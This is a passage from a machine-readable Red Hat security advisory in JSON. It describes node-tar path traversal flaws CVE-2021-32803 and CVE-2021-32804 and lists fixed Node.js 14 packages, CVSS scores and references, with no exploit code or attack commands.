Traversal\u0027)" }, "discovery_date": "2021-08-04T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1990415" } ], "notes": [ { "category": "description", "text": "The npm package \"tar\" (aka node-tar) has an arbitrary File Creation/Overwrite vulnerability via insufficient symlink protection. `node-tar` aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary `stat` calls to determine whether a given path is a directory, paths are cached when directories are created.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay 3.3 uses an affected version of nodejs-tar. However Quay 3.3 is in extended life phase and a fix will not be delivered[1]. More recent versions of Red Hat Quay do not include nodejs-tar and are not affected.\n\n1. https://access.redhat.com/support/policy/updates/rhquay\n\nRed Hat Enterprise Linux version 8 and Red Hat Software Collection both embed node-tar in the npm command. However, npm explicitly prevents the extraction of symlink via a filter. npm might still be affected via node-gyp, if the attacker is able to control the target URL.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-32803" }, { "category": "external", "summary": "RHBZ#1990415", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990415" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-32803", "url": "https://www.cve.org/CVERecord?id=CVE-2021-32803" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-32803", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32803" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw" } ], "release_date": "2021-08-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3280" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient symlink protection allowing arbitrary file creation and overwrite" }, { "cve": "CVE-2021-32804", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)" }, "discovery_date": "2021-08-04T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1990409" } ], "notes": [ { "category": "description", "text": "The npm package \"tar\" (aka node-tar) has an arbitrary File Creation/Overwrite vulnerability due to insufficient absolute path sanitization. node-tar aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay 3.3 uses an affected version of nodejs-tar. However Quay 3.3 is in extended life phase and a fix will not be delivered[1]. More recent versions of Red Hat Quay do not include nodejs-tar and are not affected.\n\n1. https://access.redhat.com/support/policy/updates/rhquay\n\nRed Hat Enterprise Linux version 8 and Red Hat Software Collection both embed node-tar in the npm command. A specially crafted node module could create and overwrite files outside of its dedicated directory.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64" ], "known_not_affected": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-nodemon-0:2.0.3-5.el7.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-32804" }, { "category": "external", "summary": "RHBZ#1990409", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1990409" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-32804", "url": "https://www.cve.org/CVERecord?id=CVE-2021-32804" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-32804", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32804" }, { "category": "external", "summary": "https://github.com/npm/node-tar/security/advisories/GHSA-3jfq-g458-7qm9", "url": "https://github.com/npm/node-tar/security/advisories/GHSA-3jfq-g458-7qm9" } ], "release_date": "2021-08-03T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:21:32+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-debuginfo-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-devel-0:14.17.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs14-nodejs-docs-0:14.17.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs14-npm-0:6.14.14-14.17.5.1.el7.ppc64le", 